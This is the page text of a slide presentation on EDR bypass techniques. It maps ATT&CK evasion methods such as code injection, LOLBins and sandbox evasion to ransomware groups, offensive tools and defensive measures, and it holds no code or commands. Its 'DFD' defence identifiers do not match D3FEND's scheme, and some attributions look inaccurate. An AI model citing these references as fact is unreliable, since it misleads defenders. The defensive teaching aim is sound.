Presentation on EDR bypasses and relevant offensive and defensive techniques
CarloDapino
42 views
11 slides
Oct 10, 2024
Slide 1 of 11
1
2
3
4
5
6
7
8
9
10
11
About This Presentation
I will evaluate MITRE ATT&CK specific to EDR bypasses, using a context of a real attack and data breach, highlighting the relevant MITRE D3F3ND technique, for your blue team.
Slide Content
EDR BYPASS
AND LIMITATIONS
By : Carlo Dapino
License Type: CC BY-NC-ND 4.0
https://creativecommons.org/licenses/by-nc-nd/4.0/
AND LIMITATIONS
By : Carlo Dapino
License Type: CC BY-NC-ND 4.0
https://creativecommons.org/licenses/by-nc-nd/4.0/
OBFUSCATED FILES OR INFORMATION (T1027)
EXAMPLE: IN 2021, THE CONTI RANSOMWARE GANG (A RAAS PLATFORM) WAS KNOWN FOR USING
OBFUSCATED PAYLOADS TO HIDE THEIR MALWARE FROM TRADITIONAL SECURITY TOOLS.
CRIMINAL PLATFORM: CONTI RAAS PLATFORM, NOTORIOUS FOR DISTRIBUTING OBFUSCATED
RANSOMWARE ACROSS VARIOUS ORGANIZATIONS.
TOOLS: TOOLS LIKE VEIL AND HYPERION ARE COMMONLY USED TO OBFUSCATE MALICIOUS FILES
AND SCRIPTS, HELPING ATTACKERS EVADE DETECTION.
MITIGATION: USE ADVANCED DETECTION MECHANISMS AND REGULAR CODE SCANNING FOR
OBFUSCATED FILES.
DEFENSE REFERENCE (MITRE D3FEND): DFD0007 - OBFUSCATED FILE ANALYSIS: DE-
OBFUSCATION TECHNIQUES TO ANALYZE CODE FOR HIDDEN THREATS.Copyright 2024 - Carlo Dapino
EXAMPLE: IN 2021, THE CONTI RANSOMWARE GANG (A RAAS PLATFORM) WAS KNOWN FOR USING
OBFUSCATED PAYLOADS TO HIDE THEIR MALWARE FROM TRADITIONAL SECURITY TOOLS.
CRIMINAL PLATFORM: CONTI RAAS PLATFORM, NOTORIOUS FOR DISTRIBUTING OBFUSCATED
RANSOMWARE ACROSS VARIOUS ORGANIZATIONS.
TOOLS: TOOLS LIKE VEIL AND HYPERION ARE COMMONLY USED TO OBFUSCATE MALICIOUS FILES
AND SCRIPTS, HELPING ATTACKERS EVADE DETECTION.
MITIGATION: USE ADVANCED DETECTION MECHANISMS AND REGULAR CODE SCANNING FOR
OBFUSCATED FILES.
DEFENSE REFERENCE (MITRE D3FEND): DFD0007 - OBFUSCATED FILE ANALYSIS: DE-
OBFUSCATION TECHNIQUES TO ANALYZE CODE FOR HIDDEN THREATS.Copyright 2024 - Carlo Dapino
Copyright 2024 - Carlo Dapino CODE INJECTION (T1055)
EXAMPLE: RYUK RANSOMWARE USES DLL INJECTION TO EVADE EDR BY EXECUTING CODE WITHIN
LEGITIMATE SYSTEM PROCESSES.
CRIMINAL PLATFORM: RYUK RAAS.
TOOLS: METASPLOIT AND COBALT STRIKE FOR CODE INJECTION.
DEFENSE REFERENCE : DFD0009 - CODE INJECTION DETECTION: MONITOR PROCESSES FOR
SUSPICIOUS MEMORY MODIFICATIONS.
EXAMPLE: RYUK RANSOMWARE USES DLL INJECTION TO EVADE EDR BY EXECUTING CODE WITHIN
LEGITIMATE SYSTEM PROCESSES.
CRIMINAL PLATFORM: RYUK RAAS.
TOOLS: METASPLOIT AND COBALT STRIKE FOR CODE INJECTION.
DEFENSE REFERENCE : DFD0009 - CODE INJECTION DETECTION: MONITOR PROCESSES FOR
SUSPICIOUS MEMORY MODIFICATIONS.
Copyright 2024 - Carlo Dapino DISABLING OR MODIFYING SECURITY SOFTWARE (T1562)
EXAMPLE: THE REVIL RANSOMWARE GROUP DISABLED EDR AND ANTIVIRUS SOFTWARE USING
SYSTEM VULNERABILITIES.
CRIMINAL PLATFORM : REVIL RAAS.
TOOLS: PROCESS HACKER TO DISABLE SECURITY SOFTWARE.
DEFENSE REFERENCE: DFD0012 - SOFTWARE CONFIGURATION MONITORING: TRACK CHANGES TO
SECURITY TOOLS, ENABLING SELF-PROTECTION MECHANISMS.
EXAMPLE: THE REVIL RANSOMWARE GROUP DISABLED EDR AND ANTIVIRUS SOFTWARE USING
SYSTEM VULNERABILITIES.
CRIMINAL PLATFORM : REVIL RAAS.
TOOLS: PROCESS HACKER TO DISABLE SECURITY SOFTWARE.
DEFENSE REFERENCE: DFD0012 - SOFTWARE CONFIGURATION MONITORING: TRACK CHANGES TO
SECURITY TOOLS, ENABLING SELF-PROTECTION MECHANISMS.
Copyright 2024 - Carlo Dapino LIVING OFF THE LAND (LOLBINS) (T1218)
EXAMPLE: FIN7 USED POWERSHELL AND WMIC TO EXECUTE MALICIOUS PAYLOADS WITHOUT
NEEDING TO DROP NEW EXECUTABLE FILES.
CRIMINAL PLATFORM: FIN7 GROUP.
TOOLS: POWERSHELL AND WMIC AS LEGITIMATE TOOLS LEVERAGED FOR MALICIOUS INTENT.
DEFENSE REFERENCE: DFD0016 - APPLICATION EXECUTION PREVENTION: RESTRICT ACCESS TO
POTENTIALLY DANGEROUS SYSTEM TOOLS.
EXAMPLE: FIN7 USED POWERSHELL AND WMIC TO EXECUTE MALICIOUS PAYLOADS WITHOUT
NEEDING TO DROP NEW EXECUTABLE FILES.
CRIMINAL PLATFORM: FIN7 GROUP.
TOOLS: POWERSHELL AND WMIC AS LEGITIMATE TOOLS LEVERAGED FOR MALICIOUS INTENT.
DEFENSE REFERENCE: DFD0016 - APPLICATION EXECUTION PREVENTION: RESTRICT ACCESS TO
POTENTIALLY DANGEROUS SYSTEM TOOLS.
Copyright 2024 - Carlo Dapino PROCESS DOPPELGÄNGING (T1055.013)
EXAMPLE: NOTPETYA USED PROCESS DOPPELGÄNGING TECHNIQUES TO EXECUTE MALWARE
WITHOUT WRITING IT TO DISK.
CRIMINAL PLATFORM : NOTPETYA (NATION-STATE LEVEL OPERATIONS).
TOOLS: DOPPELGÄNGER TOOLS FOR FILELESS MALWARE EXECUTION.
DEFENSE REFERENCE : DFD0009 - PROCESS INJECTION DETECTION: ADVANCED MEMORY
FORENSICS TO DETECT CODE INJECTIONS INTO LEGITIMATE PROCESSES.
EXAMPLE: NOTPETYA USED PROCESS DOPPELGÄNGING TECHNIQUES TO EXECUTE MALWARE
WITHOUT WRITING IT TO DISK.
CRIMINAL PLATFORM : NOTPETYA (NATION-STATE LEVEL OPERATIONS).
TOOLS: DOPPELGÄNGER TOOLS FOR FILELESS MALWARE EXECUTION.
DEFENSE REFERENCE : DFD0009 - PROCESS INJECTION DETECTION: ADVANCED MEMORY
FORENSICS TO DETECT CODE INJECTIONS INTO LEGITIMATE PROCESSES.
Copyright 2024 - Carlo Dapino VIRTUALIZATION/SANDBOX EVASION (T1497)
EXAMPLE: MAZE RANSOMWARE DETECTED SANDBOX ENVIRONMENTS AND DELAYED EXECUTION
TO AVOID EARLY DETECTION.
CRIMINAL PLATFORM: MAZE RAAS.
TOOLS: PARANOID FISH FOR VIRTUAL MACHINE DETECTION.
DEFENSE REFERENCE : DFD0018 - VIRTUALIZATION EVASION DETECTION: HARDEN SANDBOX AND
VIRTUAL ENVIRONMENTS TO PREVENT DETECTION.
EXAMPLE: MAZE RANSOMWARE DETECTED SANDBOX ENVIRONMENTS AND DELAYED EXECUTION
TO AVOID EARLY DETECTION.
CRIMINAL PLATFORM: MAZE RAAS.
TOOLS: PARANOID FISH FOR VIRTUAL MACHINE DETECTION.
DEFENSE REFERENCE : DFD0018 - VIRTUALIZATION EVASION DETECTION: HARDEN SANDBOX AND
VIRTUAL ENVIRONMENTS TO PREVENT DETECTION.
Copyright 2024 - Carlo Dapino MASQUERADING (T1036)
EXAMPLE: SOLARWINDS ATTACKERS DISGUISED MALICIOUS UPDATES AS LEGITIMATE SOFTWARE
UPDATES TO EVADE DETECTION.
CRIMINAL PLATFORM: APT29 (LINKED TO STATE-SPONSORED GROUPS).
TOOLS: BATCHOBFUSCATOR TO MODIFY FILE NAMES AND METADATA TO EVADE DETECTION.
DEFENSE REFERENCE: DFD0014 - FILE METADATA MONITORING: ANALYZE AND VERIFY FILE
METADATA FOR CONSISTENCY AND AUTHENTICITY.
EXAMPLE: SOLARWINDS ATTACKERS DISGUISED MALICIOUS UPDATES AS LEGITIMATE SOFTWARE
UPDATES TO EVADE DETECTION.
CRIMINAL PLATFORM: APT29 (LINKED TO STATE-SPONSORED GROUPS).
TOOLS: BATCHOBFUSCATOR TO MODIFY FILE NAMES AND METADATA TO EVADE DETECTION.
DEFENSE REFERENCE: DFD0014 - FILE METADATA MONITORING: ANALYZE AND VERIFY FILE
METADATA FOR CONSISTENCY AND AUTHENTICITY.
GPU MEMORY?
BROWSER SANDBOXES?
(SEE MAGECART ALIKE)
WEB ASSEMBLY?
RUST AND LANGUAGES COMPILED ON
THE FLY ALIKE?
MOBILE PLATFORMS? Copyright 2024 - Carlo Dapino
BROWSER SANDBOXES?
(SEE MAGECART ALIKE)
WEB ASSEMBLY?
RUST AND LANGUAGES COMPILED ON
THE FLY ALIKE?
MOBILE PLATFORMS? Copyright 2024 - Carlo Dapino
Copyright 2024 - Carlo Dapino
Download
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 42
- Slides 11
- Age 416 days
Related Slideshows
32
figurative-language power point.pptththtrht
acecamero20
19 views
22
Figurative-Language-powerpoint.pptgttgth
acecamero20
21 views
44
Plasma proteins functions electroforesis - Copy.pptx
DratoshKatiyar
20 views
2
FORMATO 4. PLANTEAMIENTO DEL PROBLEMA. 4 Oct. 2022.ppt
LuisLopez350618
17 views
4
Cristiano Ronaldo jugador portugués, la leyenda
laparchizacorp
16 views
10
🎮✨ Top 10 Most Used Software Tools by Indie Game Developers (2025 Edition)
cheapersgamecomcare
16 views